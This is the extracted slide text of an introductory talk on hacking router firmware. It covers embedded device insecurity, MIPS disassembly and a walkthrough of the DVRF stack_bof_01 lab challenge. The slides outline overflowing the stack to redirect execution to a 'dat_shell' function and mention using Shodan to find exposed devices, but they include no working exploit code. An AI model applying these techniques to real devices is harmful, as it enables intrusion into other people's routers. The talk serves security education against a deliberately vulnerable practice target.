intro to hardware firmware hacking
TRANSCRIPT
Intro to Hardware Firmware Hacking
Andrew Freeborn
1
• The Wild West
• What’s MIPS
• Let’s break it
• Pictures!
Agenda
2
Embedded Devices
3
• Cheap and everywhere
• Lots of options for home routers, modems, etc
• New models every year with new features
• No real regulation of the safety and strength of the security of the device (CyberUL to help?)
• Krebs attack / Ukraine power grid
Embedded Devices Are Awesome
4
We get it, they’re bad
5
TLC?
6
• Easy to get into surprisingly
• Easier if you stick to the rivers and lakes.... Software
• Like many problems, issues can be fixed when there is attention on them
They’re not bad, they just need TLC
7
• All software updated
• Kernel updates
• Kernel hardening
• Compiler protections
• Make updating easy and secure with little effort
• Scanned for vulnerabilities
Embedded Device Solutions
8
• DVRF
• MIPS CPU
• MIPS assembly >>
• ???
• Profit • MIPS binaries
When do we get to see dat MIPS
• hello.c • MIPS diassembly
What the MIPS?
https://www.onlinedisassembler.com/odaweb/GzjLonX7
•Anybody can do this search and find this information
• Source: https://www.shodan.io/search?query=netgear
What about security?
• Prologue
• Middle-logue?
• Epilogue
Show me that MIPS again
•Why do we care?
•Are there other buffer overflows?
• Source: https://en.wikipedia.org/wiki/Call_stack
What’s a stack buffer overflow?
13
• Why start here?
• How many challenges are there?
Stack buffer overflows in DVRF
Intro •stack_bof_01 •heap_overflow_01 •uaf_01
ShellCode_Required •stack_bof_02 •socket_bof •socket_cmd
14
• Let’s run it!
stack_bof_01
15
• Hulk smash!
stack_bof_01
• Static analysis with floss (the new strings!)
Smashed the stack, now what
• Lots of ways to do this
•
• IDA
• Online Disassembler >>
Graph me like one of your French binaries
www.onlinedisassembler.com/odaweb/OXabeNP7
• Functions
• main
• dat_shell
• other things we don’t care about
What’s on the menu?
• Debugger like GDB
• Plain GDB is not pretty
• pwndbg makes it nice >>
• Use gdb-multiarch
• This really is helpful >>
Dynamic analysis
• You just need the right amount of “As”
• Provide the memory address of dat_shell
Python to the rescue
21
• https://vivirytech.blogspot.com
• Twitter: @vivirytech
Thanks!
22